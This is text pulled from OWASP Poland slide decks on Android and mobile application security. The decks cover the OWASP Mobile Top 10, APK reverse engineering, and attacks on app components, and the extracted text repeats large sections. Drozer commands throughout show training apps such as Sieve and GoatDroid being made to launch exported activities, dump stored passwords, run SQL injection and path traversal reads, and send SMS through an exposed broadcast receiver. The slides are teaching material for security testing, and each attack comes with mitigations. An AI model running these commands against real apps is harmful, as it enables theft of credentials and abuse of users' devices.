ltreceiver androidname=broadcastreceiversSendSMSNowReceiverrdquoandroidlabel=Send SMS gt ltintent-filtergt
ltaction androidname=orgowaspgoatdroidfourgoatsSOCIAL_SMS gt ltintent-filtergtltreceivergthellipltuses-permission androidname=androidpermissionSEND_SMS gt
Sample manifest from GoatDroid
Broadcast receivers
Broadcast receivers attacks
public void onReceive(Context arg0 Intent arg1) context = arg0 SmsManager sms = SmsManagergetDefault() Bundle bundle = arg1getExtras() smssendTextMessage(bundlegetString(phoneNumber) null bundlegetString(message) null null) UtilsmakeToast(context ConstantsTEXT_MESSAGE_SENT ToastLENGTH_LONG)
The following is the code that determines how the receiver handles the orgowaspgoatdroidfourgoatsSOCIAL_SMS actions
Broadcast receivers
Broadcast receivers attacks
run appbroadcastsend --action orgowaspgoatdroidfourgoatsSOCIAL_SMS --component orgowaspgoatdroidfourgoats orgowaspgoatdroidfourgoatsbroadcastreceiversSendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies for all abovementioned itemsbull Setting androidexported attribute to false
(only this user ID as the current app will be able to access the activity)
bull Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Dalvik VMbull The software that runs the apps on Android devicesbull Its fast even on weak CPUs bull it will run on systems with little memory bull it will run in an energy-efficient way bull Provides application portability and runtime consistency bull Runs optimized file format (dex) and Dalvik bytecodebull Java class jar files converted to dex at build time
ART VS DVMbull Android 44 ndash Experimental From android 50 - Defaultbull Ahead-of-time (AOT) compilationbull Improved garbage collectionbull Improved diagnostic detail in exceptions and crash reports
Application FrameworkActivity Manager Manages the activity life cycle of applications
Content Providers Manage the data sharing between applications
Telephony Manager Manages all voice calls
Location Manager Location management using GPS or cell tower
Resource Manager Manage the various types of resources we use in our Application
Application Layer bull SMS client appbull Dialerbull Web browserbull Contact manager
APK how itrsquos works
Android Application Security
bull Android sandbox
bull Permission labels defined in AndroidManifestxml
bull Signature
bull Install time security decisionsbull Android 60 Security release
Android 60bull Runtime Permissionsbull Verified Bootbull Hardware-Isolated Security bull Fingerprintsbull SD Card Adoptionbull Clear Text Traffic bull System Hardeningbull USB Access Control
Defense layers
Google Play
1 2 3 4 5
Require and validate
Developer information
Review Applications
before distribution
Permanently stop
distribution
Reduce attacker flexibility
Remove applications
after installation
Apps from Unknown Sources
By default only Google Play and other pre-installed app stores are allowed to install apps
The vast majority of installs come from Google Play
Verify AppsApps are verified prior to install
Warn for or block Potentially Harmful Applications
Over 10 million installs verified every day
Verifying is on and visible when need
Core security features to build secure applicaton
bull The Android Application Sandboxbull An application framework with robust implementations of common
security functionality such as cryptography permissionsbull An encrypted file system that can be enabled to protect data on lost
or stolen devicesbull User-granted permissions to restrict access to system features and
user databull Application-defined permissions to control application data on a
per-app basis
Thank you
Any questions
Linksbull httpdeveloperandroidcomaboutdashboardsindexhtmlbull httpsdocsgooglecompresentationd1YDYUrD22Xq12nKkhBfwoJBfw2Q-OReMr0BrDfHyfyPwpub
start=falseamploop=falseampdelayms=3000ampslide=idg1202bd8e5_0193bull httpwwwcubridorgblogdev-platformandroid-at-a-glancebull httpnewssoftpediacomnewsGoogle-Introduces-Android-L-Developer-Preview-Material-Design-ART-64-Bit-Support-Volta-448367shtmlbull httpdeveloperandroidcomtoolsbuildingindexhtmlbull httpandroid-anythingdiandiancompost2011-09-285377936bull httpwwwvogellacomtutorialsAndroidarticlehtmlandroiddevelopment_artbull httpssourceandroidcomdevicestechdalvikindexhtmlbull httpsenwikipediaorgwikiAndroid_Runtimebull httpssourceandroidcomdevicestechdalvikgc-debughtmlbull httpssourceandroidcomsecurityoverviewapp-securityhtmlbull httpwwwjavatpointcominternal-details-of-hello-android-examplebull httpsdecompileandsecureapkwordpresscom20140510decompile-and-secure-android-apkbull httpdeveloperandroidcomtoolsdebuggingdebugging-memoryhtmlLogMessagesbull httpssourceandroidcomdevicesbull httpwwwcubridorgblogdev-platformandroid-at-a-glancebull httpdeveloperandroidcomtrainingarticlessecurity-tipshtmlbull httpsdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull httpssourceandroidcomsecurityoverviewapp-securityhtmlbull httpwwwcompiletimeerrorcom201212blog-posthtmlVsReZ_krKM-bull httpwwwslidesharenetSperasoftsperasoft-talks-android-security-threatsqid=d4d0db3a-0451-4150-95e0-dcd364cc95b4ampv=qf1ampb=ampfrom_search=8bull httpwwweazytutzcomandroidandroid-architecturebull httpwwwtutorialspointcomandroidandroid_architecturehtm
Application Components Security
Alexander AntukhOWASP Poland24022016
Android Application Security
Often the app contains some sensitive databull Passwordsbull Authentication tokensbull Contactsbull Communication recordsbull IP addresses or domain names to sensitive
services
Android Application Security
Global problems in securing the applicationsbull How sensitive data is storedndash Isolationndash Privilege separation
bull How sensitive data is transmittedndash Extra-device communicationndash Inter-application communicationndash Inter-component communication
Android Application Components
Activities Services
Content providers
Broadcast
receivers
Android Application Components
AndroidManifestxml defines in which way the app works and what kind of interaction between components and outer world is possible Permissions are set there too
bull Activities ndash ltactivitygtbull Services ndash ltservicegtbull Content providers ndash ltprovidergtbull Broadcast receivers ndash ltreceivergt
Android Manifest
Sample manifest fileNote the followingbull Permissions
ltuses-permission androidname=stringgtltpermission androidprotectionLevel=hellip gt
bull Components and their attributes
AndroidManifestxml
Android Manifest
Protection levelsbull dangerous ndash increased risk (directly affect users)bull normal ndash minimal risk (default value)bull signature ndash same certificatebull signatureOrSystem ndash same certificate || app in
Android system image
Android Manifest
bull debuggablebull enabledbull exportedbull permission
Activities Services
Content provider
s
Broadcast
receivers
Example components attributes
IntentsAn intent is a defined object used for messaging that is created and communicated to an intended application component It includes all relevant information about calling application desired application component and request actionsdata
Intent intent = new Intent(IntentACTION_VIEW) intentsetData(Uriparse(httpwwwgooglecom)) String pack = comandroidbrowser ComponentName comp = new ComponentName(pack pack + BrowserActivity)intentsetComponent(comp)
startActivity(intent)
Drozer
Open source tool to interact with other applications through IPC - leading security assessment framework for Android
Manual on installation and usage
Drozer
The best thing about Drozer you donrsquot need to write your apps to interact with other apps )
dzgt run appactivitystart --action androidintentactionVIEW --data-uri httpwwwgooglecom --component comandroidbrowser comandroidbrowserBrowserActivity
DrozerIs installed in a default package of AppUse with adb so enough just bdquoclick-and-playrdquo
Activity components
An Activity provides a screen with which users can interact in order to do something Users can perform operations such as making a call sending an SMS etc
Example login screen of your Facebook app
Activities
Activity components attacks
bull If an activity can be triggered by other apps (by an attacker) it can be abused
bull Launching by intents itrsquos possible to achieve the followingndash Modify data in backgroundndash Tricking the userndash Leaking sensitive information
Activities
Activity components attacksbull General hijacking scheme
bull Results of an attackndash Malicious Activity could read the data in the Intent and then
immediately relay it to a legitimate onendash Spoofing the expected Activityrsquos user interface to steal user-supplied
data (phishing)
A B
E
Activities
Activity components attacks Activities
bull List and launch exported activities
dzgt run appactivityinfo -a commwrexamplesieve Package commwrexamplesieve commwrexamplesieveFileSelectActivity commwrexamplesieveMainLoginActivity commwrexamplesievePWList
dzgt run appactivitystart --component commwrexamplesieve commwrexamplesievePWList
Activity components demo Activities
Services
A Service can perform long-running operations in the background and does not provide a user interface Other components can bind to a Service which lets the binder invoke methods that are declared in the target Servicersquos interface Intents are used to start and bind to Services
Example playing music or downloading a file
Services
Services attacks
Although generally donrsquot seem dangerous they could potentially perform sensitive operations
To attack a service one need interaction (it must be exported or respondaccept input from message formats like intents files or the network stack)
Services
Services attacks
Typical attacks Denial of Service and Information Leakage
bull Find exported servicesbull Launch them one-by-one with logcat to check
for sensitive infobull Fire off intents and wait for it
Services
Content providers
A content provider presents data to external applications as one or more tables In other words content providers can be treated as interfaces that connect data in one process with code running in another process
Example using content providers any app can read SMS from inbuilt SMS apprsquos repository in our device
Content providers
Content providers
bull What info can they holdndash Userrsquos phone numbersndash Passwordsndash SMS
bull And one of the main problems are again permissions
run appproviderinfo --permission null
Content providers
Content providers attacks
bull Unrestricted access to app databasendash Just query it ndash run appproviderquery contentsettingssecure
bull SQL injectionbull Path traversal
Other attack vectors on auth might include altering data eg by using appproviderinsert command
Content providers
dzgt run scannerproviderinjection -a commwrexamplesieve
Content providers attacks
bull Unrestricted access to app database
Content providers
dzgt run scannerproviderfinduris -a commwrexamplesieve Accessible content URIs contentcommwrexamplesieveDBContentProviderKeys contentcommwrexamplesieveDBContentProviderPasswordscontentcommwrexamplesieveDBContentProviderPasswords
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --vertical
Content providers attacks
bull SQL injection
Content providers
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --selection unrecognized token ) (code 1) while compiling SELECT FROM Passwords WHERE ()
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --projection FROM Key--| Password | pin || thisismypassword | 9876 |
Content providers attacks
bull Path traversal
Content providers
One interesting real-life example httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-application
dzgt run appproviderread contentcommwrexamplesieveFileBackupProvideretchosts127001 localhost
dzgt run appproviderdownload contentcommwrexamplesieveFileBackupProviderdatadatacommwrexamplesie vedatabasesdatabasedb homeuserdatabasedbWritten 24576 bytes
Content providers demo Content providers
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low boot completed headset plug etc Though most of the broadcast receivers are originated by the system applications can also announce broadcasts
Broadcast receivers
Broadcast receivers
bull If receiver accepts broadcasts from untrusted sources app is at risk
Broadcast receivers
Broadcast receivers attacks
Typical fail authorization
bull Enumerate receiversbull Determine how the receiver handles the
actionbull Send intent and enjoy
Broadcast receivers
Broadcast receivers attacks
ltreceiver androidname=broadcastreceiversSendSMSNowReceiverrdquoandroidlabel=Send SMS gt ltintent-filtergt
ltaction androidname=orgowaspgoatdroidfourgoatsSOCIAL_SMS gt ltintent-filtergtltreceivergthellipltuses-permission androidname=androidpermissionSEND_SMS gt
Sample manifest from GoatDroid
Broadcast receivers
Broadcast receivers attacks
public void onReceive(Context arg0 Intent arg1) context = arg0 SmsManager sms = SmsManagergetDefault() Bundle bundle = arg1getExtras() smssendTextMessage(bundlegetString(phoneNumber) null bundlegetString(message) null null) UtilsmakeToast(context ConstantsTEXT_MESSAGE_SENT ToastLENGTH_LONG)
The following is the code that determines how the receiver handles the orgowaspgoatdroidfourgoatsSOCIAL_SMS actions
Broadcast receivers
Broadcast receivers attacks
run appbroadcastsend --action orgowaspgoatdroidfourgoatsSOCIAL_SMS --component orgowaspgoatdroidfourgoats orgowaspgoatdroidfourgoatsbroadcastreceiversSendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies for all abovementioned itemsbull Setting androidexported attribute to false
(only this user ID as the current app will be able to access the activity)
bull Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
